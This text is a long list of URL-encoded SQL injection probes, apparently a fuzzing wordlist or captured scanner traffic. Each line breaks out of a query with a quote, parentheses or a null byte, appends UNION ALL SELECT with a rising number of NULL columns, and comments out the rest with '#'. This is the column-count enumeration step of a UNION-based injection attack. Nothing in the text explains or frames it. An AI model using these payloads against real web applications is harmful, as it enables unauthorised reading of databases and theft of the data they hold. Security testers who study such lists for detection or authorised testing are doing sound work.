foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 